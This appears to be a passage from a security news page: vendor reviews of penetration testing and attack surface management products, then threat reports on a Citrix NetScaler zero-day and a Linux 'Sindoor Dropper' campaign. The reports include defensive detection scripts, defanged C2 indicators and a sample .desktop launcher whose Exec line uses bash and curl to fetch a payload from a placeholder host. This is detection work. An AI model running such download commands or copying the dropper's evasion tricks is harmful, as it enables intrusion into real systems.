PTaaS Platform | Yes | Platform provides a dashboard for testing.
Human-Led Testing | Yes | Manual testing team for verification.
Automated Scanning | Yes | Continuous automated vulnerability scanning.
Reporting | Yes | Provides reports with retesting to confirm fixes.
Best For: Small to mid-sized businesses and startups that need a cost-effective, easy-to-use, and continuous solution for web application security.
In 2025, the best web application penetration testing is no longer a one-time event but a continuous, integrated process.
The leading companies on this list, like NetSPI, Cobalt.io, and Synack, are those that have successfully blended human expertise with technology platforms to deliver a more efficient and effective solution.
While traditional firms like Bishop Fox and Rhino Security Labs remain excellent for high-stakes, deep-dive engagements, the future belongs to companies that can provide flexible, on-demand services that meet the needs of modern DevOps.
Ultimately, the best choice for your organization will depend on whether you prioritize a platform-based approach, a continuous testing model, or a highly specialized, expert-led engagement.
Attack Surface Management (ASM) is a proactive security discipline focused on continuously discovering, analyzing, and reducing an organization’s external-facing digital footprint.
In 2025, with the proliferation of cloud services, remote work, and supply chain dependencies, an organization’s attack surface has grown exponentially.
Top ASM solutions have evolved beyond simple asset inventory to provide AI-driven risk scoring, automated discovery of “shadow IT,” and continuous monitoring from a hacker’s perspective, helping security teams find and fix vulnerabilities before attackers can exploit them.
Why We Choose It
Traditional vulnerability management often struggles to provide a complete picture of an organization’s exposed assets.
ASM solves this by taking an “outside-in” view, identifying unknown, misconfigured, or unmanaged assets that could serve as entry points for an attacker.
The best solutions for 2025 leverage a combination of internet-wide scanning, passive reconnaissance, and active probing to provide a single, unified view of all internet-facing assets, including those in the cloud, acquired through mergers, or managed by third parties.
How We Choose It
We evaluated these solutions based on the following criteria:
Experience & Expertise (E-E): The vendor’s long-standing reputation and expertise in cybersecurity and threat intelligence.
Authoritativeness & Trustworthiness (A-T): Recognition from leading industry analysts like Gartner and Forrester, and the trust placed in them by a broad range of enterprise customers.
Feature-Richness: The comprehensiveness of their platform, focusing on the seamless integration of core ASM capabilities:
Continuous Discovery: The ability to find known and unknown assets in real time.
Risk Scoring: Prioritizing vulnerabilities based on an attacker’s perspective.
Integration: The ability to integrate with existing security tools and workflows.
Automated Remediation: Providing clear, actionable steps for fixing discovered issues.
Microsoft’s acquisition of RiskIQ forms the foundation of its Defender External ASM solution. It provides a full, external view of an organization’s internet-facing assets, including those previously unknown or unmanaged.
Leveraging Microsoft’s global threat intelligence, Defender External ASM provides a continuous map of your digital footprint, prioritizing risks based on what’s most likely to be exploited.
It’s a key component of the broader Microsoft Defender platform, offering seamless integration for existing Microsoft customers.
Why You Want to Buy It:
The native integration with the Microsoft Defender suite streamlines security operations and provides a unified view of both internal and external risks.
This consolidation simplifies management and enhances a security team’s ability to respond to threats.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Continuously maps all internet-facing assets.
Attacker-Centric View | Yes | Provides an external view of risk.
Risk Prioritization | Yes | AI-driven prioritization based on threat intelligence.
Integration | Yes | Deep integration with Microsoft Defender and Azure.
Best For: Enterprises that are heavily invested in the Microsoft security ecosystem and want a deeply integrated, AI-powered ASM solution.
Palo Alto Networks’ Cortex Xpanse is a leading External Attack Surface Management (EASM) solution that specializes in finding unknown risks and misconfigurations.
It uses automated reconnaissance techniques to discover and map an organization’s internet-facing assets and services.
The platform’s key strength lies in its ability to provide a complete and accurate inventory of an organization’s digital assets, including those that are “shadow IT,” which traditional tools often miss.
Why You Want to Buy It:
Cortex Xpanse provides unparalleled visibility into the external attack surface. It’s highly effective at finding unmanaged and unknown assets, which is a critical first step in a proactive security program.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Actively probes the internet to discover assets.
Attacker-Centric View | Yes | Finds exposures from a hacker’s perspective.
Risk Prioritization | Yes | Prioritizes issues with contextual risk scoring.
Integration | Yes | Integrates with other Cortex products and third-party tools.
Best For: Large enterprises that need a robust, comprehensive, and automated solution for discovering and managing their external attack surface.
CrowdStrike Falcon Surface is a key component of the broader Falcon platform, offering a unified approach to managing an organization’s attack surface.
The solution provides a real-time, adversary-driven view of external risks, identifying exposed assets and prioritizing them based on active threats.
Its seamless integration with the CrowdStrike Falcon platform allows security teams to correlate external risks with internal data, providing a holistic view of the attack surface.
Why You Want to Buy It:
CrowdStrike’s unified platform approach is a major advantage.
It allows security teams to consolidate tools, reduce complexity, and leverage the same lightweight agent and console for both internal and external security, making it highly efficient.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Real-time discovery of external-facing assets.
Attacker-Centric View | Yes | Provides an adversary-driven perspective on risks.
Risk Prioritization | Yes | Prioritizes vulnerabilities based on threat intelligence.
Integration | Yes | Deeply integrated with the Falcon platform.
Best For: Companies that already use CrowdStrike for endpoint security and want to extend that same level of visibility and control to their external attack surface.
Mandiant, now part of Google Cloud, brings its world-class threat intelligence and incident response expertise to its Attack Surface Management platform.
Mandiant Advantage ASM provides continuous monitoring of the external ecosystem, using Mandiant’s frontline intelligence to identify exploitable exposures.
The platform’s ability to perform “active checks” that are benign but simulate attacker reconnaissance gives security teams a powerful way to validate risks with real-world context.
Why You Want to Buy It:
The combination of an ASM platform with Mandiant’s extensive threat intelligence and frontline incident response data is a game-changer.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Continuously monitors the external ecosystem.
Attacker-Centric View | Yes | Uses Mandiant’s intelligence for active checks.
Risk Prioritization | Yes | Prioritizes risks based on real-world exploitability.
Integration | Yes | Seamlessly integrates with Google Cloud Security.
Best For: Organizations that need a solution backed by world-class threat intelligence and a team of experts with deep knowledge of real-world attacker tactics.
IBM Randori takes an attacker’s perspective to a new level by offering an “automated red team.”
The platform continuously maps an organization’s external attack surface and uses sophisticated techniques to identify and test for exploitable entry points.
By simulating the actions of a real attacker, IBM Randori helps security teams discover blind spots and prioritize the most tempting targets for an adversary, providing an objective measure of cyber risk.
Why You Want to Buy It:
The automated red teaming feature is a unique value proposition.
Instead of just identifying vulnerabilities, it actively tests them in a safe and controlled manner, giving security teams definitive proof of an exposure and its potential impact.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Continuously maps exposed assets.
Attacker-Centric View | Yes | Simulates attacker reconnaissance and testing.
Risk Prioritization | Yes | Ranks risks based on “adversarial temptation.”
Integration | Yes | Integrates with the broader IBM Security portfolio.
Best For: Enterprises that want to continuously test their security defenses with an automated red team simulation to find and fix critical exposures.
Qualys CSAM is a core component of the Qualys Cloud Platform, providing a centralized and continuous view of both internal and external assets.
It goes beyond traditional vulnerability management by providing a comprehensive, single-pane-of-glass dashboard for all IT and security assets.
The platform automatically discovers all assets in the environment, classifies them, and provides a risk score based on their criticality and potential vulnerabilities.
Why You Want to Buy It:
Qualys’ single-agent, cloud-native platform simplifies asset management and vulnerability assessment across hybrid environments. It provides a highly effective way to gain visibility and manage risk from a single console.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Discovers and inventories all IT and security assets.
Attacker-Centric View | Yes | Provides a holistic view of external risks.
Risk Prioritization | Yes | Uses Qualys’ threat intelligence to score risks.
Integration | Yes | Deep integration within the Qualys Cloud Platform.
Best For: Organizations that already use Qualys for vulnerability management and want to extend that capability to a full-fledged ASM program.
Tenable ASM (formerly Tenable.io) is a powerful EASM solution that provides a comprehensive view of an organization’s public-facing attack surface.
The platform continuously scans the internet to discover, analyze, and monitor internet-facing assets.
It is a key part of Tenable’s broader Exposure Management platform, allowing security teams to correlate external risks with internal vulnerabilities for a more complete picture of their security posture.
Why You Want to Buy It:
Tenable’s long-standing expertise in vulnerability management makes its ASM solution highly effective.
It provides a seamless transition from external discovery to internal vulnerability scanning and remediation, simplifying the entire risk management lifecycle.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Maps all internet-facing devices and services.
Attacker-Centric View | Yes | Provides an external view of risk.
Risk Prioritization | Yes | Leverages Tenable’s vulnerability intelligence.
Integration | Yes | Integrates with Tenable.io for a unified view.
Best For: Security teams that need a dedicated and highly effective EASM solution with deep integration into their vulnerability management program.
Rapid7 ASM is a key offering within the company’s Insight Platform, providing a unified view of an organization’s external attack surface.
The platform continuously discovers and monitors external assets, identifying misconfigurations, exposed services, and other vulnerabilities.
By correlating this external data with internal telemetry from other Rapid7 solutions, ASM provides a comprehensive view of risk and helps teams prioritize remediation based on real-world threat intelligence.
Why You Want to Buy It:
Rapid7’s Insight Platform provides a powerful synergy between its different products.
The ability to correlate external ASM findings with internal vulnerability and threat data is a major advantage, allowing security teams to make more informed decisions and respond faster.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Discovers and inventories all external assets.
Attacker-Centric View | Yes | Provides an external view of risk.
Risk Prioritization | Yes | Uses Rapid7 Labs intelligence for prioritization.
Integration | Yes | Deeply integrated into the Insight Platform.
Best For: Organizations that want a unified platform for vulnerability management, detection and response, and external attack surface management.
CyCognito provides a leading EASM platform that uses a unique graph database and AI to discover and prioritize external risks.
It automates the work of a security analyst, continuously scanning the internet to find assets associated with a company and its third parties.
The platform’s ability to automatically prioritize risks based on their exploitability and business context makes it a highly effective solution for managing a sprawling, complex attack surface.
Why You Want to Buy It:
CyCognito’s AI-driven approach to risk prioritization is a key differentiator.
It automates the discovery and analysis process, allowing security teams to focus on fixing the most critical issues rather than spending time on manual reconnaissance and investigation.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Automatically maps a company’s attack surface.
Attacker-Centric View | Yes | Uses a graph database to simulate attacker paths.
Risk Prioritization | Yes | Prioritizes risks based on exploitability.
Integration | Yes | Integrates with SIEM, ticketing, and other tools.
Best For: Companies with a complex, global footprint that need to find and prioritize risks with minimal manual effort.
FireCompass takes a unique approach to ASM by combining it with a Continuous Automated Red Teaming (CART) solution.
The platform not only discovers an organization’s digital footprint but also automatically launches simulated attacks to test its defenses.
This provides security teams with a clear, objective measure of their security posture and helps them identify and fix exploitable vulnerabilities before attackers can.
Why You Want to Buy It:
FireCompass’s CART solution is its key selling point. It provides a dynamic and proactive security posture, ensuring that an organization’s defenses are continuously challenged and improved in a real-world context.
Feature | Yes/No | Specification
Continuous Discovery | Yes | Discovers assets from an attacker’s perspective.
Attacker-Centric View | Yes | Actively probes and attacks the surface.
Risk Prioritization | Yes | Prioritizes based on real-world attack simulations.
Integration | Yes | Integrates with SIEM, ticketing, and other tools.
Best For: Organizations that want to go beyond simple asset discovery and continuously test their defenses with automated red team exercises.
In 2025, an effective attack surface management solution is no longer a luxury; it’s a necessity.
The top solutions on this list have moved beyond basic asset inventory to provide intelligent, attacker-centric, and automated capabilities that are critical for defending against modern threats.
For organizations that are already in the Microsoft or CrowdStrike ecosystems, Microsoft Defender External ASM and CrowdStrike Falcon Surface offer seamless integration and a unified platform.
For those looking for best-of-breed, highly specialized EASM, Palo Alto Cortex Xpanse and CyCognito provide unparalleled discovery and risk prioritization.
Companies that want to take a more aggressive, proactive approach will find value in the automated red teaming offered by IBM Randori and FireCompass.
Ultimately, the right solution depends on your organization’s specific needs, existing technology stack, and security maturity.
A sophisticated voice phishing operation has emerged as a significant threat to organizations worldwide, with cybercriminals successfully infiltrating Salesforce environments to steal sensitive data and demand ransom payments. Google’s Threat Intelligence Group has identified this financially motivated campaign, designating the primary threat cluster as UNC6040, which has demonstrated alarming success in breaching corporate networks through […]
Cybersecurity researchers have called attention to a cyber attack in which unknown threat actors deployed an open-source endpoint monitoring and digital forensic tool called Velociraptor, illustrating ongoing abuse of legitimate software for malicious purposes.
“In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a
A critical zero-day vulnerability in Citrix NetScaler products, identified as CVE-2025-6543, has been actively exploited by threat actors since at least May 2025, months before a patch was made available.
While Citrix initially downplayed the flaw as a “memory overflow vulnerability leading to unintended control flow and Denial of Service,” it has since been revealed to allow for unauthenticated remote code execution (RCE), leading to widespread compromise of government and legal services worldwide.
In late June 2025, Citrix released a patch for CVE-2025-6543. However, by that time, attackers had already been leveraging the vulnerability for weeks.
The exploit was used to infiltrate NetScaler remote access systems, deploy webshells to ensure persistent access even after patching, and steal credentials.
Evidence suggests that Citrix was aware of the severity and the ongoing exploitation but failed to disclose the full extent of the threat to its customers, Kevin Beaumont said.
The company provided a script to check for compromise only upon request and under restrictive conditions, without fully explaining the situation or the script’s limitations.
The Dutch National Cyber Security Centre (NCSC) has played a pivotal role in exposing the true nature of the attacks. Their investigation confirmed that the vulnerability was exploited as a zero-day and that attackers actively covered their tracks, making forensic analysis challenging.
The NCSC’s report, released in August 2025, stated that “several critical organizations within the Netherlands have been successfully attacked” and that the vulnerability was abused since at least early May.
How the Exploit Works
The same sophisticated threat actor is also believed to be behind the exploitation of another zero-day, CVE-2025-5777, also known as CitrixBleed 2, which was used to steal user sessions.
Investigations are ongoing to determine if this actor is also responsible for exploiting a more recent vulnerability, CVE-2025-7775.
The CVE-2025-6543 vulnerability allows an attacker to overwrite system memory by supplying a malicious client certificate to the /cgi/api/login endpoint on a vulnerable NetScaler device.
By sending hundreds of these requests, an attacker can overwrite enough memory to execute arbitrary code on the system. This method gives them a foothold in the network, which they have used to move laterally into Active Directory environments by misusing stolen LDAP service account credentials.
Security professionals urge all organizations using internet-facing Citrix NetScaler devices to take immediate action.
System administrators should check for signs of compromise, such as large POST requests to /cgi/api/login in web access logs, often arriving in quick succession.
A corresponding NetScaler log error code of 1245184, indicating an invalid client certificate, is a strong indicator of an exploitation attempt.
The NCSC has released scripts on GitHub to help organizations check for compromise on live hosts and in coredump files.
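The two indicators above (bursts of large POSTs to /cgi/api/login and ns.log error code 1245184) can be checked with a short triage script. This is an added example, not the NCSC or Citrix scripts; it assumes a constructed access-log layout of `IP [timestamp] "METHOD PATH PROTO" STATUS REQUEST_BYTES` and ns.log lines that carry the error code as plain text, and the size and burst thresholds are this example's own choices, not values from the advisory.

```python
"""Log triage for the CVE-2025-6543 indicators quoted above (added example,
not the NCSC or Citrix scripts).

Assumptions not stated on the page: access-log lines in the constructed
format  IP [timestamp] "METHOD PATH PROTO" STATUS REQUEST_BYTES, and ns.log
lines that carry the numeric error code as plain text. Adapt the two
regexes to your own export format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators taken from the advisory text.
TARGET_PATH = "/cgi/api/login"
INVALID_CLIENT_CERT_CODE = "1245184"

# Thresholds are this example's assumptions; the advisory gives none.
LARGE_BODY_BYTES = 2048          # what counts as a "large" POST body
BURST_WINDOW = timedelta(seconds=60)
BURST_COUNT = 20                 # "hundreds of requests ... in quick succession"

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_access_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FORMAT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "bytes": int(m.group("bytes")),
    }


def find_login_bursts(lines):
    """Return {source_ip: peak_count} for sources that sent at least
    BURST_COUNT large POSTs to /cgi/api/login inside any BURST_WINDOW."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] != TARGET_PATH or rec["bytes"] < LARGE_BODY_BYTES:
            continue
        stamps_by_ip[rec["ip"]].append(rec["ts"])

    suspects = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end in range(len(stamps)):          # sliding window over time
            while stamps[end] - stamps[start] > BURST_WINDOW:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= BURST_COUNT:
            suspects[ip] = peak
    return suspects


def count_invalid_cert_errors(ns_log_lines):
    """Count ns.log lines reporting error code 1245184 (invalid client cert)."""
    code_re = re.compile(r"\b%s\b" % INVALID_CLIENT_CERT_CODE)
    return sum(1 for line in ns_log_lines if code_re.search(line))


# Constructed sample data: one source hammering the endpoint, two benign ones.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 [10/Aug/2025:10:00:%02d +0000] "POST /cgi/api/login HTTP/1.1" 400 4096' % s
    for s in range(25)
] + [
    '198.51.100.2 [10/Aug/2025:10:00:05 +0000] "GET /vpn/index.html HTTP/1.1" 200 0',
    '198.51.100.9 [10/Aug/2025:10:00:09 +0000] "POST /cgi/api/login HTTP/1.1" 200 640',
]
# Constructed ns.log lines; the real line layout differs, only the code matters here.
SAMPLE_NS_LOG = [
    "Aug 10 10:00:01 ns ssl: client certificate validation failed, code 1245184",
    "Aug 10 10:00:02 ns ssl: client certificate validation failed, code 1245184",
    "Aug 10 10:00:02 ns ssl: handshake completed, code 0",
    "Aug 10 10:00:03 ns ssl: client certificate validation failed, code 1245184",
]

if __name__ == "__main__":
    print("burst sources:", find_login_bursts(SAMPLE_ACCESS_LOG))
    print("invalid-cert errors:", count_invalid_cert_errors(SAMPLE_NS_LOG))
```

A hit from either check is a reason to pull the device for imaging, not proof of compromise on its own; the attacker is reported to have cleaned up after exploitation, so absence of log hits is not proof of safety.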
If a system is believed to be compromised, the recommended steps are:
Immediately take the NetScaler device offline.
Image the system for forensic analysis.
Change the LDAP service account credentials to prevent lateral movement.
Deploy a new, patched NetScaler instance with fresh credentials.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-6543 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency for organizations to apply patches and hunt for signs of malicious activity.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A new malware campaign, dubbed “Sindoor Dropper,” is targeting Linux systems using sophisticated spear-phishing techniques and a multi-stage infection chain.
The campaign leverages lures themed around the recent India-Pakistan conflict, known as Operation Sindoor, to entice victims into executing malicious files.
This activity’s standout feature is its reliance on weaponized .desktop files, a method previously associated with the advanced persistent threat (APT) group APT36, also known as Transparent Tribe or Mythic Leopard.
The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a standard PDF document.
According to Nextron Systems’ analysis, upon execution it opens a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex, heavily obfuscated infection process in the background.
‘Sindoor Dropper’ Malware Targets Linux Systems
This process is designed to evade both static and dynamic analysis, with the initial payload reportedly having zero detections on VirusTotal at the time of its discovery.
The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd).
The decryptor, a Go binary packed with UPX, is intentionally corrupted by stripping its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s machine to make the binary executable again.
This kicks off a multi-stage process where each component decrypts and runs the next. The chain includes basic anti-virtual machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, enabling them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actor tradecraft, demonstrating a clear focus on Linux environments, which phishing campaigns have historically targeted far less often.
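Two of the tradecraft details above lend themselves to simple host-side triage checks: a .desktop launcher that hides a document extension and runs a shell from its Exec= line, and a binary whose ELF magic bytes have been stripped for transport. The code below is an added example, not Nextron's tooling; the regexes, the heuristic thresholds and all sample inputs are constructed for this example.

```python
"""Triage heuristics for the Sindoor Dropper tradecraft described above
(added example, not Nextron's code).

Two checks: (1) a .desktop file that poses as a document and launches a
shell or downloader from its Exec= line; (2) a file whose bytes are laid
out like an ELF header but whose first four bytes are not 0x7F 'ELF', the
stripped-magic trick the dropper uses to pass file scans. All sample
inputs below are constructed for this example.
"""
import re
import struct

ELF_MAGIC = b"\x7fELF"
VALID_E_TYPES = {1, 2, 3, 4}        # ET_REL, ET_EXEC, ET_DYN, ET_CORE

# Heuristic patterns chosen for this example (assumptions, not from the report).
DOC_BEFORE_DESKTOP = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)\.desktop$", re.IGNORECASE)
SHELL_OR_DOWNLOADER = re.compile(r"(^|[\s\"'=/])(bash|sh|zsh|curl|wget|python3?)\b")


def looks_like_headerless_elf(data: bytes) -> bool:
    """True when the ELF identification block and first header fields are
    plausible but the magic is absent. Intact ELF files return False, so
    this flags only the deliberately corrupted variant."""
    if len(data) < 64 or data[:4] == ELF_MAGIC:
        return False
    ei_class, ei_data, ei_version = data[4], data[5], data[6]
    if ei_class not in (1, 2) or ei_data not in (1, 2) or ei_version != 1:
        return False
    endian = "<" if ei_data == 1 else ">"
    # e_type, e_machine, e_version sit at offsets 16, 18 and 20 for both classes.
    e_type, e_machine, e_version = struct.unpack_from(endian + "HHI", data, 16)
    return e_type in VALID_E_TYPES and e_machine != 0 and e_version == 1


def desktop_file_findings(filename: str, content: str) -> list:
    """Return the reasons a .desktop launcher deserves a closer look."""
    findings = []
    if DOC_BEFORE_DESKTOP.search(filename):
        findings.append("document extension hidden before .desktop")
    exec_line = next((l for l in content.splitlines() if l.startswith("Exec=")), "")
    if SHELL_OR_DOWNLOADER.search(exec_line):
        findings.append("Exec= runs a shell or downloader")
    if findings and "Terminal=false" in content:
        findings.append("runs without a visible terminal")
    return findings


# Constructed samples (not real dropper artifacts).
STRIPPED_ELF64 = (
    b"\x00\x00\x00\x00"                      # magic bytes removed
    + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7   # ELFCLASS64, little-endian, EV_CURRENT
    + struct.pack("<HHI", 2, 0x3E, 1)        # ET_EXEC, EM_X86_64, EV_CURRENT
    + b"\x00" * 40                           # remaining header fields zeroed
)
INTACT_ELF64 = ELF_MAGIC + STRIPPED_ELF64[4:]
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Note_Warfare_Ops_Sindoor.pdf
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -s http://placeholder.invalid/p -o /tmp/p"
Terminal=false
Icon=application-pdf
"""

if __name__ == "__main__":
    print("stripped header flagged:", looks_like_headerless_elf(STRIPPED_ELF64))
    print("intact header flagged:", looks_like_headerless_elf(INTACT_ELF64))
    print(desktop_file_findings("Note_Warfare_Ops_Sindoor.pdf.desktop", SAMPLE_DESKTOP))
```

Run the ELF check over recently written files in user-writable paths and the .desktop check over launchers in Downloads and autostart directories; both are triage signals to pair with the network indicators, not verdicts.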
Type | Indicator | Description
Network | wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx | Command-and-control (C2) server URL for the MeshAgent payload
Network | indianbosssystems.ddns[.]net | Malicious C2 domain
Network | 54.144.107[.]42 | IP address of the C2 server, hosted on AWS
By combining timely, region-specific social engineering with advanced evasion techniques, the attackers increase their likelihood of successfully compromising sensitive networks.